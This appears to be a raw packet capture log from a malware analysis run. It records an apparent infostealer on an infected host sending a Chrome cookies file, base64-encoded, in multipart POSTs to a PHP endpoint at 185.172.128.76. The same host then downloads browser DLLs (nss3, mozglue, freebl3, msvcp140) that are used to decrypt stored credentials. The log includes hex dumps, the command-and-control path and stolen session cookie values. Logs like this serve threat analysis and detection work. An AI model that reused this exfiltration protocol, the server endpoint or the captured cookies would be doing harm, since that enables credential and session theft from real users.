Apr 26, 2024 17:11:13.840565920 CEST	1289	IN	Data Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: @B/81s:<R@B/92P @B
Apr 26, 2024 17:11:13.840701103 CEST	1289	IN	Data Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 Data Ascii: +C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Apr 26, 2024 17:11:13.840898991 CEST	1289	IN	Data Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
Apr 26, 2024 17:11:13.840969086 CEST	1289	IN	Data Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75 Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
Apr 26, 2024 17:11:17.262751102 CEST	952	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGD Host: 185.172.128.76 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------IDAAKEHJDHJKEBFHJEGD--
Apr 26, 2024 17:11:17.646526098 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:17.852317095 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDB Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="file"------FIIDBKJJDGHDHJKEHJDB--
Apr 26, 2024 17:11:18.238675117 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:20.763005972 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGH Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file"------BFIIEHJDBKJKECBFHDGH--
Apr 26, 2024 17:11:21.139167070 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:22.081892967 CEST	93	OUT	GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 17:11:22.428632021 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:22 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Apr 26, 2024 17:11:25.511826992 CEST	93	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 17:11:25.858772993 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:25 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Apr 26, 2024 17:11:27.136991024 CEST	94	OUT	GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 17:11:27.489617109 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:27 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Apr 26, 2024 17:11:30.903266907 CEST	90	OUT	GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 17:11:31.254158974 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:31 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 